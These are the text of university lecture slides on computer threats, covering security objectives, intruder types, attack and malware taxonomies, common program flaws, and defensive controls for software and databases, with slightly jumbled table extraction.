Admas University

Department of Computer Science

Chapter 2 – Computer Threats

By: Getaneh T.
 Computer Threats
 Computer threats refer to various
malicious activities and risks that can
compromise the security and integrity of
computer systems, networks, and data.
 Computer Security

 Key objectives:
 confidentiality
 integrity
 availability
 Confidentiality
 term covers two related concepts:
 Data
• assures that private or confidential information is
not made available or disclosed to unauthorized
individuals

 Privacy
• assures that individuals control or influence what
information related to them may be collected and
stored and by whom and to whom that information
may be disclosed
 Integrity
 term covers two related concepts:
 Data integrity
• assures that information and programs are
changed only in a specified and authorized manner
 System integrity
• assures that a system performs its intended
function in an unimpaired manner, free from
deliberate or inadvertent unauthorized
manipulation of the system
 Availability

assures that
systems work
promptly and
service is not
denied to
authorized users
 Loss of Security
 The loss of security in each category:
 Confidentiality
• unauthorized disclosure of information
 Integrity
• unauthorized modification or destruction of
information
 Availability
• disruption of access to or use of information or an
information system
Additional Security Objectives
 Some information security professionals
feel that two more objectives need to be
added:

Authenticity
• being genuine and able to be verified and trusted

Accountability
• actions of an entity can be traced uniquely to that
entity
• non-repudiation
 Computer and Network Assets,
with Examples of Threats
Availability Confidentiality Integrity
Equipment is stolen or
Hardware disabled, thus denying
service.
A working program is
modified, either to
Programs are deleted, An unauthorized copy cause it to fail during
Software
denying access to users. of software is made. execution or to cause it
to do some unintended
task.
An unauthorized read
of data is performed. Existing files are
Files are deleted,
Data An analysis of modified or new files
denying access to users.
statistical data reveals are fabricated.
underlying data.
Messages are destroyed Messages are modified,
or deleted. Messages are read. The delayed, reordered, or
Communication
Communication lines traffic pattern of duplicated. False
Lines
or networks are messages is observed. messages are
rendered unavailable. fabricated.
 Hardware
 most vulnerable to attack
 least susceptible to automated controls
 threats
 accidental damage
 intentional damage
 theft
 Software
 includes operating system, utilities and
application programs
 key threats:

easy to delete

can be altered or damaged

can be modified

license can be compromised or misused

 Data
 securityconcerns with respect to data are
broad, encompassing:
 availability
 secrecy
 integrity
 major concerns with data have to do with:

incorrect but
destruction of unauthorized
theft of files intentional
files reading of files
analysis of data
 Communication Lines &
Networks
 Network Security attack classification:

• goal of attacker is to gather

information without being noticed.
Passive • does not affect system resources
• two types are: release of message
contents and traffic analysis
• involves some modification of data
stream
Active • attempts to alter system resources
or affect their operation
 Classes of Intruders
 Masquerader – usually outsider
 penetrates a real users account by pretending
to be them
 Misfeasor – usually insider
 legitimate user who accesses unauthorized
areas
 Clandestine User – outsider or insider
 user who seizes supervisory control of a
system in order to avoid prevention, access
and detection controls
Behavior Patterns of Intruders:
Hackers and Criminals
 Hackers
 usually high level of competence
 share their findings
 look for targets of opportunity
 Criminals
 organized groups of hackers are a common
modern threat
 typically young
 usually have specific targets
Behavior Patterns of Intruders:
Insiders
Insider Attacks
• have access to and knowledge of
internal systems and processes
• often motivated by revenge or a feeling
of entitlement
• usually been with company for a fairly
long time
• often times trusted
 Intrusion Techniques

System or Software Vulnerabilities

Back Doors

Buffer Overflow
Password
Compromise
Root Kits

Social Engineering
 Class of attacks
 Attacks can be classified into various
categories based on different criteria. Here
are some common classifications of
attacks:
1. Network Attacks:
1. Denial of Service (DoS) Attack
2. Distributed Denial of Service (DDoS) Attack
3. Man-in-the-Middle (MitM) Attack
4. Packet Sniffing
5. IP Spoofing
6. Port Scanning
7. ARP Poisoning
 Class of attacks
 Malware Attacks:
 Viruses
 Worms
 Trojans
 Ransomware
 Spyware
 Adware
 Botnets
 Class of attacks
1. Social Engineering Attacks:
1. Phishing
2. Spear Phishing
3. Whaling
4. Vishing (Voice Phishing)
5. Smishing (SMS Phishing)
6. Pretexting
7. Baiting
8. Shoulder Surfing
 Class of attacks
 Web Application Attacks:
 SQL Injection
 Cross-Site Scripting (XSS)
 Cross-Site Request Forgery (CSRF)
 Clickjacking
 Remote File Inclusion (RFI)
 Local File Inclusion (LFI)
 Server-Side Request Forgery (SSRF)
 XML External Entity (XXE) Attack
 Class of attacks
1. Wireless Attacks:
1. Wi-Fi Eavesdropping
2. Wi-Fi Password Cracking
3. Evil Twin Attack
4. Rogue Access Point
5. Wi-Fi Deauthentication Attack
6. Bluetooth Hacking
7. Near Field Communication (NFC) Attacks
 Class of attacks
1. Physical Attacks:
1. Theft of Devices
2. Tampering with Hardware
3. Dumpster Diving
4. Tailgating (Unauthorized Access)
5. Shoulder Surfing
6. Skimming (Credit Card or ATM)
 Class of attacks
1. Insider Attacks:
1. Insider Threats
2. Unauthorized Access by Employees
3. Data Theft or Leakage
4. Sabotage
5. Fraudulent Activities
 Malicious Software

Malware comes in many

disguises:
• application programs
• utility programs (editors, compilers)
• attachments
• links
 Categories of Malicious
Software
 parasitic
 fragments of programs that cannot exist
independently of some actual application
program, utility, or system program
• viruses, logic bombs, backdoors
 independent
 self-contained programs that can be
scheduled and run by the operating system
• worms, bots
 Name Description
Virus Malware that, when executed, tries to replicate itself into other
executable code; when it succeeds the code is said to be infected. When
the infected code is executed, the virus also executes.
Worm A computer program that can run independently and can propagate a
complete working version of itself onto other hosts on a network.
Logic bomb A program inserted into software by an intruder. A logic bomb lies
dormant until a predefined condition is met; the program then triggers
an unauthorized act.
Trojan horse A computer program that appears to have a useful function, but also has
a hidden and potentially malicious function that evades security
mechanisms, sometimes by exploiting legitimate authorizations of a
system entity that invokes the Trojan horse program.

Terminology
Backdoor (trapdoor) Any mechanisms that bypasses a normal security check; it may allow
unauthorized access to functionality.
Mobile code Software (e.g., script, macro, or other portable instruction) that can be

of
shipped unchanged to a heterogeneous collection of platforms and
execute with identical semantics.
Exploits Code specific to a single vulnerability or set of vulnerabilities.
Downloaders

Auto-rooter
Program that installs other items on a machine that is under attack.
Usually, a downloader is sent in an e-mail.
Malicious hacker tools used to break into new machines remotely.
Malicious
Kit (virus generator)
Spammer programs
Set of tools for generating new viruses automatically.
Used to send large volumes of unwanted e-mail.
Programs
Flooders Used to attack networked computer systems with a large volume of
traffic to carry out a denial-of-service (DoS) attack.
Keyloggers Captures keystrokes on a compromised system.
Rootkit Set of hacker tools used after attacker has broken into a computer
system and gained root-level access.
Zombie, bot Program activated on an infected machine that is activated to launch
attacks on other machines.
Spyware Software that collects information from a computer and transmits it to
another system.
Adware Advertising that is integrated into software. It can result in pop-up ads or
redirection of a browser to a commercial site.
 Backdoor
 trapdoor
 is a secret entry point into a program that can
allow unauthorized access to the data
 backdoors are common among the programming
community and are used for a variety of
maintenance tasks (maintenance hook)
 it is important to not allow backdoors into
production environments
 Logic Bomb BOOM

 predates viruses and worms

 code embedded in a legitimate program
that will “explode” at a given time or when
certain conditions are met
 presence or absence of certain files
 particular day of the week or date
 particular user using the application

BOOM
 Trojan Horse
 program that contains hidden code that, when invoked,
causes harm to the system or system infrastructure it
was launched from

3 models of Trojan horses are typical

• continuing original program

functions while in parallel doing the
malicious activity
• continuing original program
functions but modifying it to perform
malicious activity
• replacing original program functions
with the malicious activity
 Mobile Code
 script, macro, or other portable instruction
that can be shipped unchanged to a
collection of platforms
 transmitted from a remote system to a
local system and then executed on the
local system without the user’s explicit
instruction
 mechanism for a virus, worm, or Trojan horse
 vulnerabilities such as unauthorized data
access
 Viruses
 can do anything other programs can do
 attaches itself to a program and executes
secretly
 once running it can perform any function
allowed by the current users rights

• infection
has mechanism
three • trigger
parts
• payload
 Virus Lifecycle

• Virus is
activated
Propagation to perform Execution
• The function
virus is • The virus for which
idle and places a it was • Virus
waiting copy of intended function is
Dormant itself into performed
Trigger
other
programs
 Worms
 self replicating – usually very quickly
 usually performs some unwanted function
 actively seeks out more machines to infect

Self Replicating
Vehicles
• Email
• Remote Execution
• Remote Login
 Worms
In the propagation Phases
phase the Worm will

search for other Dormant

systems to infect

Propagation

establish remote
connections Trigger

copy itself to the Execution

remote system and
cause the copy to
run
 Program flow
 Computer threats, such as malware and
cyberattacks, can have various program
flaws or vulnerabilities that make them
effective. Here are some common
program flaws that can be exploited by
computer threats:
 Buffer Overflow:
 Buffer overflow occurs when a program
tries to write more data into a buffer than it
can hold. This can lead to overwriting
adjacent memory, allowing attackers to
inject malicious code or modify critical
data. Buffer overflow vulnerabilities are
often exploited by malware to execute
arbitrary code or gain unauthorized
access.
 Injection Attacks:
 Injection attacks exploit vulnerabilities in
programs that do not properly validate or
sanitize user input. For example, SQL
injection attacks occur when an attacker
inserts malicious SQL queries into user input
fields, tricking the program into executing
unintended database operations. Similarly,
command injection attacks occur when an
attacker injects malicious commands into
user input fields, allowing them to execute
arbitrary commands on the targeted system.
 Cross-Site Scripting (XSS):
 XSS vulnerabilities occur when a program
fails to properly validate and sanitize user-
provided data that is displayed on web
pages. Attackers can inject malicious
scripts into web pages, which are then
executed by unsuspecting users'
browsers. XSS attacks can lead to session
hijacking, unauthorized data access, or
distribution of malicious content.
 Insecure Authentication and
Authorization
 Weak or flawed authentication and
authorization mechanisms can enable
unauthorized access to systems or sensitive
data. This includes the use of weak
passwords, lack of multi-factor authentication,
improper session management, and insecure
storage of user credentials. Attackers can
exploit these vulnerabilities to gain
unauthorized access to user accounts or
administrative privileges.
 Race Conditions:
 Race conditions(Time-of-check to time-of-
use flaws) occur when the outcome of a
program depends on the sequence or
timing of events that are not properly
synchronized. Attackers can exploit race
conditions to manipulate the intended
behavior of a program, such as gaining
unauthorized access to resources or
executing unauthorized operations.
 Lack of Input Validation:
 Programs that do not validate and sanitize
user input are susceptible to various
attacks, including code injection, cross-site
scripting, and command injection. Failure
to validate input allows attackers to
provide malicious input that can bypass
security measures and exploit
vulnerabilities.
 Incomplete mediation
 Incomplete mediation refers to a security
vulnerability that occurs when a system fails
to properly validate and enforce access
controls for all relevant actions or resources.
It arises when a system does not
consistently enforce security checks and
relies on assumptions about the behavior of
higher-level systems or components.
 Controls to protect against
program flaws in execution
 Toprotect against program flaws in
execution, there are several controls and
practices that can be implemented. These
controls aim to reduce the likelihood of
program flaws and mitigate their impact.
Here are some key controls to consider:
Input Validation and Sanitization

 Implement robust input validation and

sanitization techniques to ensure that user
input is properly validated and sanitized
before being processed by the program.
This helps prevent common vulnerabilities
such as buffer overflows, injection attacks,
and cross-site scripting.
 Secure Coding Practices:
 Follow secure coding practices, such as
avoiding the use of unsafe functions,
ensuring proper memory management,
and utilizing secure coding libraries and
frameworks. Adhering to coding standards
and best practices helps minimize
program flaws and vulnerabilities.
Memory Protection Mechanisms
 Utilizememory protection mechanisms,
such as address space layout
randomization (ASLR) and data execution
prevention (DEP). These mechanisms
make it more difficult for attackers to
exploit memory-related vulnerabilities and
execute arbitrary code.
 Access Controls:
 Implement strong access controls to
ensure that only authorized users or
processes can access sensitive resources
or perform critical operations. This
includes proper authentication,
authorization, and role-based access
control (RBAC).
 Security Testing:

 Conduct regular security testing, including

vulnerability scanning, penetration testing,
and code reviews. These activities help
identify and address program flaws and
vulnerabilities before they can be
exploited.
User Education and Awareness
 Educate and raise awareness among users
about potential program flaws and safe
computing practices. Encourage users to
exercise caution when interacting with
software, avoid downloading or executing
suspicious files, and report any unusual
behaviors or errors.
 .
 Operating system support and
administrative controls play a crucial role in
protecting against program flaws and
improving overall system security. These
controls are implemented at the operating
system level and focus on managing
access, enforcing security policies, and
ensuring the integrity and availability of the
system. Here are some key operating
system support and administrative controls:
 .
 User Account Management:
 Access Control:
 Privilege Separation:
 Program Security Defenses
 Program security defenses are measures
and techniques used to protect software
applications from various security threats
and vulnerabilities.
 These defenses are designed to prevent,
detect, and mitigate attacks that can exploit
program flaws and compromise the
security of the software. Here are some
common program security defenses:
 Cont’d
 Input Validation and Sanitization:
 Thoroughly validate and sanitize all user input to
prevent input-based vulnerabilities such as buffer
overflows, injection attacks, and cross-site scripting
(XSS). This involves checking input for length,
format, and type, and removing or encoding
potentially malicious characters.
 Secure Coding Practices:
 Follow secure coding principles and best practices
to minimize vulnerabilities. This includes avoiding
unsafe functions, properly managing memory,
validating all inputs and outputs, and using secure
coding libraries and frameworks
 Cont’d
 Access Control:
 Implement strong access controls to ensure that
only authorized users or processes can access
sensitive resources or perform critical operations.
This includes proper authentication, authorization,
and role-based access control (RBAC) mechanisms.
 Secure Configuration:
 Configure the software and its environment securely,
disabling unnecessary services, using secure
defaults, and applying the principle of least privilege.
This helps reduce the attack surface and limits the
potential impact of program flaws.
 Cont’d
 Encryption:
 Use encryption algorithms and protocols to protect
sensitive data at rest and in transit. This includes
encrypting passwords, sensitive configuration files,
and network communications to prevent
unauthorized access and data leakage.
 Error and Exception Handling:
 Implement robust error and exception handling
mechanisms to prevent information leakage and
crashes that can be exploited by attackers. Handle
errors gracefully, providing minimal information to
users and developers while logging detailed error
information for security monitoring.
 Software development controls and
Testing techniques
 Requirements Gathering and Documentation:
 Clearly define and document the requirements of the
software application to establish a solid foundation
for development. This includes identifying functional
and non-functional requirements, as well as any
security and performance requirements.
 Secure Design Principles:
 Apply secure design principles to develop software
architectures and designs that incorporate security
controls from the ground up. Consider security
requirements, threat modeling, and risk analysis
during the design phase.
 Cont’d
 Secure Coding Practices:
 Follow secure coding practices and guidelines to
minimize vulnerabilities. This includes using secure
coding libraries and frameworks, avoiding unsafe
functions, properly managing memory, validating
inputs, and implementing secure error and
exception handling.
 Code Reviews:
 Conduct code reviews to identify potential flaws,
vulnerabilities, and coding errors. Peer code
reviews can help detect issues early in the
development process and ensure adherence to
secure coding practices.
 Cont’d
 Security Testing:
 Perform specialized security testing focused on
identifying and validating security controls and
mechanisms. This includes vulnerability scanning,
penetration testing, security-focused test cases, and
security-specific test frameworks.
 Integration Testing:
 Test the interaction between different components
and modules of the software application to ensure
they work together as expected. Integration testing
helps identify issues related to data flow,
communication, and interoperability.
 Cont’d
 User Acceptance Testing (UAT):
 Involve end-users or stakeholders in the testing
process to validate that the software meets their
requirements and expectations. UAT helps identify
usability issues, missing functionality, and other
issues that may not have been captured in earlier
testing phases.
 Performance Testing:
 Conduct performance testing to assess the
responsiveness, scalability, and stability of the
software application under expected and peak loads.
Performance testing helps identify bottlenecks,
resource usage issues, and potential security
Database management systems
security
 Database management systems (DBMS)
security refers to the measures and practices
employed to protect the confidentiality,
integrity, and availability of data stored in a
database system. DBMS security is crucial as
databases often store sensitive and valuable
information. Here are some key aspects of
database management systems security:
 Cont’d
 Access Control:
 Implement robust access control mechanisms to
ensure that only authorized users or processes can
access the database. This includes user
authentication, strong password policies, role-
based access control (RBAC), and fine-grained
access permissions at the table and column levels.
 Encryption:
 Use encryption techniques to protect data at rest
and in transit within the database system. This
includes encrypting sensitive data fields, database
backups, and network communications between
the database server and client applications.
 Cont’d
 Auditing and Logging:
 Enable auditing and logging features provided by the
DBMS to track and monitor database activities. This
helps in detecting unauthorized access attempts,
identifying suspicious activities, and providing an
audit trail for forensic analysis and compliance
requirements.
 Patch Management:
 Regularly apply security patches and updates
provided by the DBMS vendor to address known
vulnerabilities. Stay informed about database security
advisories and promptly apply patches to protect
against emerging threats.
 Cont’d
 Backup and Recovery:
 Implement regular backup procedures to ensure the
availability and integrity of the database. Backups
should be encrypted, stored securely, and tested for
restoreability. Establish a well-defined recovery
process to minimize downtime and data loss in the
event of a security incident or system failure.
 Secure Configuration:
 Configure the DBMS securely by following best
practices and vendor recommendations. Disable
unnecessary services and features, secure default
accounts and passwords, and implement secure
network configurations to reduce the attack surface.
 Cont’d
 Database Activity Monitoring:
 Implement database activity monitoring solutions to
detect and respond to suspicious or malicious
activities in real-time. Database activity monitoring
tools can help identify unauthorized access
attempts, unusual query patterns, or data exfiltration
attempts.
 Data Masking and Redaction:
 Apply data masking and redaction techniques to
protect sensitive data in non-production
environments or when sharing data with external
parties. Data masking replaces sensitive data with
realistic but fictional data, while data redaction
selectively hides sensitive information in query results.
 Cont’d
 Database Vulnerability Assessment and Penetration
Testing:
 Conduct regular vulnerability assessments and
penetration testing of the database system to identify
security weaknesses and potential vulnerabilities.
This helps uncover misconfigurations, weak access
controls, and other security issues that could be
exploited by attackers.
 Database Security Training and Awareness:
 Provide training and awareness programs to
database administrators and users to educate them
about database security best practices. This includes
topics such as secure coding practices, data handling
procedures, and incident response protocols.
 Cont’d
 Separation of Duties:
 Implement separation of duties by assigning different
responsibilities to different individuals or roles within
the database management process. This helps
prevent unauthorized access and reduces the risk of
insider threats.
 Database Encryption Key Management:
 Implement strong key management practices to
protect encryption keys used to encrypt database
data. This includes secure key storage, rotation, and
access controls to ensure the confidentiality and
integrity of encrypted data.
 Summary
 computer security concepts
 threats, attacks, and assets
 hardware, software, data
 intruders
 hackers, criminals, insiders
 malicious software
 Trojan horse, malware
 viruses, worms, and bots